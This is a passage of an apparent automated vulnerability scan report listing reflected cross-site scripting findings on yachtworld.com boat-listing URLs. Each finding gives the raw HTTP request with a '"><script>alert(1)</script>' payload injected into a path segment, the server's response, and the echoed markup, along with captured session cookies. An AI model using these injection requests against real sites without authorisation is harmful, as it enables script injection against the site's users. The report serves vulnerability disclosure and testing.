nited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&138a0"><script>alert(1)</script>a5a2c4dcb2d=1&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States&boat_id=2305173">
...[SNIP]...

3.97. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7c2f"><script>alert(1)</script>22176e24a46 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmingtone7c2f"><script>alert(1)</script>22176e24a46/NC/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:58 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:57 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
el="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmingtone7c2f"><script>alert(1)</script>22176e24a46/NC/United-States&boat_id=2305157">
...[SNIP]...

3.98. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad86"><script>alert(1)</script>1a4dcae2003 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NCfad86"><script>alert(1)</script>1a4dcae2003/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:24 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:23 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
"nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NCfad86"><script>alert(1)</script>1a4dcae2003/United-States&boat_id=2305157">
...[SNIP]...

3.99. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 833dd"><script>alert(1)</script>f4cd42b8d3c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States833dd"><script>alert(1)</script>f4cd42b8d3c HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:44 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3